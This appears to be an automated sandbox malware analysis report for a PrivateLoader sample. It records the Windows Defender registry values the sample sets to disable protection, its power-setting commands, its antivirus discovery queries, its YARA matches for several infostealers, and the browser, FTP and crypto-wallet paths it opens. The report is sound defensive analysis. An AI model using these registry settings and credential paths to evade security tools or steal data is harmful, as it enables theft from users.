Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

10_2_004A7829

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

10_2_004A7829

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe

Code function: 7_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

7_2_00414B04

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1	Jump to behavior

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Registry value created: Exclusions_Extensions 1

Jump to behavior

Modifies Group Policy settings

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.35b6dc2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.3499550.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.3499550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.35b6dc2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2801068038.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 16.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.3dfd620.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.3dfd620.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3000839541.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2467637502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bQnXcKn6ehLDJGqEStjbnSyC.exe PID: 2076, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000011.00000002.2691859636.00000000004DD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2691859636.00000000004DF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2691859636.000000000047C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2723255959.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2568546778.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NoCZBiPwAcSyoDte_ne2sJt7.exe PID: 2872, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000024.00000002.2468755517.0000000000A2E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: MSBuild.exe, 00000024.00000002.2468755517.0000000000A2E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000024.00000002.2468755517.0000000000A2E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: MSBuild.exe, 00000024.00000002.2468755517.0000000000A2E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000024.00000002.2468755517.0000000000A2E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: MSBuild.exe, 00000024.00000002.2468755517.0000000000A2E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000024.00000002.2468755517.0000000000A2E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965969296.0000013417198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: Yara match	File source: 00000010.00000002.2547476892.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2547476892.0000000002D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 16.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.3dfd620.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.3dfd620.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3000839541.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2467637502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bQnXcKn6ehLDJGqEStjbnSyC.exe PID: 2076, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000011.00000002.2691859636.00000000004DD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2691859636.00000000004DF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2691859636.000000000047C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2723255959.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2568546778.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NoCZBiPwAcSyoDte_ne2sJt7.exe PID: 2872, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	61 Disable or Modify Tools	2 OS Credential Dumping	12 System Time Discovery	Remote Services	11 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	5 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	21 Windows Service	1 Bypass User Account Control	1 Abuse Elevation Control Mechanism	11 Input Capture	177 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Valid Accounts	4 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	Distributed Component Object Model	11 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	Network Logon Script	1 Access Token Manipulation	12 Software Packing	LSA Secrets	381 Security Software Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Windows Service	1 Timestomp	Cached Domain Credentials	281 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	612 Process Injection	1 DLL Side-Loading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Bypass User Account Control	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	22 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Valid Accounts	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Modify Registry	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	281 Virtualization/Sandbox Evasion	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	612 Process Injection	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	1 Hidden Files and Directories	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	68%	ReversingLabs	Win64.Trojan.PrivateLoader
284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	51%	Virustotal		Browse
284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe	100%	Avira	TR/Redcap.turvo
C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	100%	Avira	HEUR/AGEN.1318094
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe	100%	Avira	HEUR/AGEN.1318094
